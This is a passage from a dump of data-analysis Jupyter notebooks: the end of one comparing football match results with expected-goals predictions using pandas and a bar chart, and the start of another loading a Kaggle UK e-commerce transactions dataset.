408 |        "    </tr>\n",
409 |        "  </thead>\n",
410 |        "  <tbody>\n",
411 |        "    <tr>\n",
412 |        "      <th>10</th>\n",
413 |        "      <td>2016</td>\n",
414 |        "      <td>2016-08-12</td>\n",
415 |        "      <td>French Ligue 1</td>\n",
416 |        "      <td>Bastia</td>\n",
417 |        "      <td>Paris Saint-Germain</td>\n",
418 |        "      <td>0.0</td>\n",
419 |        "      <td>1.0</td>\n",
420 |        "      <td>0.97</td>\n",
421 |        "      <td>0.63</td>\n",
422 |        "      <td>2</td>\n",
423 |        "      <td>X</td>\n",
424 |        "    </tr>\n",
425 |        "    <tr>\n",
426 |        "      <th>11</th>\n",
427 |        "      <td>2016</td>\n",
428 |        "      <td>2016-08-12</td>\n",
429 |        "      <td>French Ligue 1</td>\n",
430 |        "      <td>AS Monaco</td>\n",
431 |        "      <td>Guingamp</td>\n",
432 |        "      <td>2.0</td>\n",
433 |        "      <td>2.0</td>\n",
434 |        "      <td>2.45</td>\n",
435 |        "      <td>0.77</td>\n",
436 |        "      <td>X</td>\n",
437 |        "      <td>1</td>\n",
438 |        "    </tr>\n",
439 |        "    <tr>\n",
440 |        "      <th>12</th>\n",
441 |        "      <td>2016</td>\n",
442 |        "      <td>2016-08-13</td>\n",
443 |        "      <td>Barclays Premier League</td>\n",
444 |        "      <td>Hull City</td>\n",
445 |        "      <td>Leicester City</td>\n",
446 |        "      <td>2.0</td>\n",
447 |        "      <td>1.0</td>\n",
448 |        "      <td>0.85</td>\n",
449 |        "      <td>2.77</td>\n",
450 |        "      <td>1</td>\n",
451 |        "      <td>2</td>\n",
452 |        "    </tr>\n",
453 |        "    <tr>\n",
454 |        "      <th>13</th>\n",
455 |        "      <td>2016</td>\n",
456 |        "      <td>2016-08-13</td>\n",
457 |        "      <td>Barclays Premier League</td>\n",
458 |        "      <td>Everton</td>\n",
459 |        "      <td>Tottenham Hotspur</td>\n",
460 |        "      <td>1.0</td>\n",
461 |        "      <td>1.0</td>\n",
462 |        "      <td>0.73</td>\n",
463 |        "      <td>1.11</td>\n",
464 |        "      <td>X</td>\n",
465 |        "      <td>X</td>\n",
466 |        "    </tr>\n",
467 |        "    <tr>\n",
468 |        "      <th>14</th>\n",
469 |        "      <td>2016</td>\n",
470 |        "      <td>2016-08-13</td>\n",
471 |        "      <td>Barclays Premier League</td>\n",
472 |        "      <td>Crystal Palace</td>\n",
473 |        "      <td>West Bromwich Albion</td>\n",
474 |        "      <td>0.0</td>\n",
475 |        "      <td>1.0</td>\n",
476 |        "      <td>1.11</td>\n",
477 |        "      <td>0.68</td>\n",
478 |        "      <td>2</td>\n",
479 |        "      <td>X</td>\n",
480 |        "    </tr>\n",
481 |        "  </tbody>\n",
482 |        "</table>\n",
483 |        "</div>"
484 |       ],
485 |       "text/plain": [
486 |        "    season        date                   league           team1  \\\n",
487 |        "10    2016  2016-08-12           French Ligue 1          Bastia   \n",
488 |        "11    2016  2016-08-12           French Ligue 1       AS Monaco   \n",
489 |        "12    2016  2016-08-13  Barclays Premier League       Hull City   \n",
490 |        "13    2016  2016-08-13  Barclays Premier League         Everton   \n",
491 |        "14    2016  2016-08-13  Barclays Premier League  Crystal Palace   \n",
492 |        "\n",
493 |        "                   team2  score1  score2   xg1   xg2 result xg_result  \n",
494 |        "10   Paris Saint-Germain     0.0     1.0  0.97  0.63      2         X  \n",
495 |        "11              Guingamp     2.0     2.0  2.45  0.77      X         1  \n",
496 |        "12        Leicester City     2.0     1.0  0.85  2.77      1         2  \n",
497 |        "13     Tottenham Hotspur     1.0     1.0  0.73  1.11      X         X  \n",
498 |        "14  West Bromwich Albion     0.0     1.0  1.11  0.68      2         X  "
499 |       ]
500 |      },
501 |      "execution_count": 22,
502 |      "metadata": {},
503 |      "output_type": "execute_result"
504 |     }
505 |    ],
506 |    "source": [
507 |     "data.head()"
508 |    ]
509 |   },
510 |   {
511 |    "cell_type": "markdown",
512 |    "metadata": {},
513 |    "source": [
514 |     "If we go directly and ask a question \"How many games ended with the actual result distinct from the xG (expected) one?\", we find that this number is quite big - 14310 out of 29659"
515 |    ]
516 |   },
517 |   {
518 |    "cell_type": "code",
519 |    "execution_count": 26,
520 |    "metadata": {},
521 |    "outputs": [
522 |     {
523 |      "data": {
524 |       "text/plain": [
525 |        "14310"
526 |       ]
527 |      },
528 |      "execution_count": 26,
529 |      "metadata": {},
530 |      "output_type": "execute_result"
531 |     }
532 |    ],
533 |    "source": [
534 |     "data[data['xg_result'] != data['result']].count()[0]"
535 |    ]
536 |   },
537 |   {
538 |    "cell_type": "markdown",
539 |    "metadata": {},
540 |    "source": [
541 |     "Or we can say that 48.25% of the games do not end up the same as it should (according to xG metric)"
542 |    ]
543 |   },
544 |   {
545 |    "cell_type": "code",
546 |    "execution_count": 31,
547 |    "metadata": {},
548 |    "outputs": [
549 |     {
550 |      "data": {
551 |       "text/plain": [
552 |        "'48.25%'"
553 |       ]
554 |      },
555 |      "execution_count": 31,
556 |      "metadata": {},
557 |      "output_type": "execute_result"
558 |     }
559 |    ],
560 |    "source": [
561 |     "f\"{data[data['xg_result'] != data['result']].count()[0]/data.count()[0]*100:.2f}%\""
562 |    ]
563 |   },
564 |   {
565 |    "cell_type": "markdown",
566 |    "metadata": {},
567 |    "source": [
568 |     "That seems quite unfair. But as we know there are 3 different outcomes in each football game: victory, draw and defeat. So let's compare how many times teams won and should have won, drew and should have drawn, lost and should have lost.\n",
569 |     "\n",
570 |     "To do this we will create an abstract dataset of results and xg_results and see how these two sets of values differ."
571 |    ]
572 |   },
573 |   {
574 |    "cell_type": "code",
575 |    "execution_count": 32,
576 |    "metadata": {},
577 |    "outputs": [],
578 |    "source": [
579 |     "results = data[['result', 'xg_result']]"
580 |    ]
581 |   },
582 |   {
583 |    "cell_type": "code",
584 |    "execution_count": 33,
585 |    "metadata": {},
586 |    "outputs": [
587 |     {
588 |      "data": {
589 |       "text/plain": [
590 |        "1    12755\n",
591 |        "X     9847\n",
592 |        "2     7057\n",
593 |        "Name: xg_result, dtype: int64"
594 |       ]
595 |      },
596 |      "execution_count": 33,
597 |      "metadata": {},
598 |      "output_type": "execute_result"
599 |     }
600 |    ],
601 |    "source": [
602 |     "results['xg_result'].value_counts()"
603 |    ]
604 |   },
605 |   {
606 |    "cell_type": "code",
607 |    "execution_count": 34,
608 |    "metadata": {},
609 |    "outputs": [
610 |     {
611 |      "data": {
612 |       "text/plain": [
613 |        "1    13289\n",
614 |        "2     8784\n",
615 |        "X     7586\n",
616 |        "Name: result, dtype: int64"
617 |       ]
618 |      },
619 |      "execution_count": 34,
620 |      "metadata": {},
621 |      "output_type": "execute_result"
622 |     }
623 |    ],
624 |    "source": [
625 |     "results['result'].value_counts()"
626 |    ]
627 |   },
628 |   {
629 |    "cell_type": "markdown",
630 |    "metadata": {},
631 |    "source": [
632 |     "And now let's put these values in a bar chart next to each other."
633 |    ]
634 |   },
635 |   {
636 |    "cell_type": "code",
637 |    "execution_count": 58,
638 |    "metadata": {},
639 |    "outputs": [
640 |     {
641 |      "data": {
642 |       "text/plain": [
643 |        "<matplotlib.legend.Legend at 0x7f8228477910>"
644 |       ]
645 |      },
646 |      "execution_count": 58,
647 |      "metadata": {},
648 |      "output_type": "execute_result"
649 |     },
650 |     {
651 |      "data": {
652 |       "image/png": "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",
653 |       "text/plain": [
654 |        "<Figure size 432x288 with 1 Axes>"
655 |       ]
656 |      },
657 |      "metadata": {
658 |       "needs_background": "light"
659 |      },
660 |      "output_type": "display_data"
661 |     }
662 |    ],
663 |    "source": [
664 |     "x = ['1', 'X', '2']\n",
665 |     "scores = results['result'].value_counts().values\n",
666 |     "xg_scores = results['xg_result'].value_counts().values\n",
667 |     "  \n",
668 |     "X_axis = np.arange(len(x))\n",
669 |     "  \n",
670 |     "plt.bar(X_axis - 0.2, scores, 0.4, label = 'Actual results', color='navy')\n",
671 |     "plt.bar(X_axis + 0.2, xg_scores, 0.4, label = 'Expected results', color='orange')\n",
672 |     "plt.xticks(np.arange(3), ['1', 'X', '2'])\n",
673 |     "plt.legend()\n"
674 |    ]
675 |   },
676 |   {
677 |    "cell_type": "markdown",
678 |    "metadata": {},
679 |    "source": [
680 |     "And what we can see visually is that there is no such a huge difference between actual outcomes and expected ones. And if we put this into numbers we get:"
681 |    ]
682 |   },
683 |   {
684 |    "cell_type": "code",
685 |    "execution_count": 56,
686 |    "metadata": {},
687 |    "outputs": [
688 |     {
689 |      "name": "stdout",
690 |      "output_type": "stream",
691 |      "text": [
692 |       "1: 4.19%\n",
693 |       "X: 10.80%\n",
694 |       "2: 7.50%\n"
695 |      ]
696 |     }
697 |    ],
698 |    "source": [
699 |     "diffs = list(np.divide(scores, xg_scores))\n",
700 |     "\n",
701 |     "for diff in diffs:\n",
702 |     "    print(f'{x[diffs.index(diff)]}: {abs(1-diff)*100:.2f}%')"
703 |    ]
704 |   },
705 |   {
706 |    "cell_type": "markdown",
707 |    "metadata": {},
708 |    "source": [
709 |     "It means that when we compare the amount of games that ended up in the victory of home team in reality, we can see that this number differs from expected xG_result only in 4.19% of occasions, draws differ in 10.80% of occasions, and victories of away teams - in 7.5%. So, apparently, football IS fair?"
710 |    ]
711 |   },
712 |   {
713 |    "cell_type": "markdown",
714 |    "metadata": {},
715 |    "source": [
716 |     "## Conclusion\n",
717 |     "\n",
718 |     "I will be honest here, I've got a bit confused in the end and not sure if the steps I took are correct. I am not trying to manipulate data consciously, but maybe I am making an error by comparing the datapoints in a wrong way.\n",
719 |     "\n",
720 |     "Anyway, what my conclusion is the following: we can claim that football is quite fair game as stronger team usually wins against weaker one. And even though the actual results of every particular game might not correspond to the expected ones, on the global scale, when we talk big numbers, we can see that the distribution of real outcomes and expected ones are quite similar, therefore the conclusion that football is fair makes sense (taking into account our benchmark of 90% of same outcomes or 10% of different outcomes)"
721 |    ]
722 |   }
723 |  ],
724 |  "metadata": {
725 |   "kernelspec": {
726 |    "display_name": "Python 3.8.10 ('venv': venv)",
727 |    "language": "python",
728 |    "name": "python3"
729 |   },
730 |   "language_info": {
731 |    "codemirror_mode": {
732 |     "name": "ipython",
733 |     "version": 3
734 |    },
735 |    "file_extension": ".py",
736 |    "mimetype": "text/x-python",
737 |    "name": "python",
738 |    "nbconvert_exporter": "python",
739 |    "pygments_lexer": "ipython3",
740 |    "version": "3.8.10"
741 |   },
742 |   "orig_nbformat": 4,
743 |   "vscode": {
744 |    "interpreter": {
745 |     "hash": "439571daf87331876600085d8386dc908c3f950474647915ed4fb6541957308b"
746 |    }
747 |   }
748 |  },
749 |  "nbformat": 4,
750 |  "nbformat_minor": 2
751 | }
752 | 


--------------------------------------------------------------------------------
/E-Commerce_ Predicting Sales.ipynb:
--------------------------------------------------------------------------------
1 | {"cells":[{"metadata":{"id":"iInTqLqao6Pj","colab_type":"text"},"cell_type":"markdown","source":"We live in the world of e-commerce. We see tons of different stores here and there through the web. Internet made it possible to trade with anyone and everywhere. We can buy goods without leaving our house, we can compare prices in different stores within seconds, we can find what we really want and do not accept just the first more or less suitable offer. And I believe it would be really interesting to look at this world through the data it produces. That's why I decided to play around with e-commerce numbers and try to understand it better.\n\nThe data used in this analysis is taken from Kaggle dataset [\"E-Commerce Data | Actual transactions of UK retailer\"](https://www.kaggle.com/carrie1/ecommerce-data). \n\nThis is a transnational data set which contains all the transactions occurring between 01/12/2010 and 09/12/2011 for a UK-based and registered non-store online retail.The company mainly sells unique all-occasion gifts. Many customers of the company are wholesalers."},{"metadata":{},"cell_type":"markdown","source":"As always, we start our analysis by setting up our environment and by importing necessary libraries.\n\nWe import standard numpy and pandas to be able to perform analysis with Python, also we need data visualization libraries matplotlib and seaborn to output interesting visual findings, aaaaand some settings to make our kernel prettier."},{"metadata":{"id":"tII5uwykox0s","colab_type":"text"},"cell_type":"markdown","source":"# 1. Import libraries and data"},{"metadata":{"id":"YhbJLUN2an2n","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nplt.style.use('fivethirtyeight')\n%matplotlib inline","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"We import our data using *.read_csv()* method and we also add a parameter \"encoding='latin'\" as default encoding engine wasn't able to process this particular dataset. So next time you have difficulties importing data and everything seems to be correct and OK, check out encoding. That might save you some time of googling to try to understand what's wrong."},{"metadata":{"id":"MeUgjP_ga6z_","colab_type":"code","outputId":"cb557913-8c23-4c87-b116-4cb36d9359f2","colab":{"base_uri":"https://localhost:8080/","height":198},"trusted":true},"cell_type":"code","source":"# for Kaggle\ndf = pd.read_csv('/kaggle/input/ecommerce-data/data.csv', encoding='latin')\n# df = pd.read_csv('data.csv', encoding='latin')\ndf.head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Just by looking at first 5 rows of our table we can understand the structure and datatypes present in our dataset. We can notice that we will have to deal with timeseries data, integers and floats, categorical and text 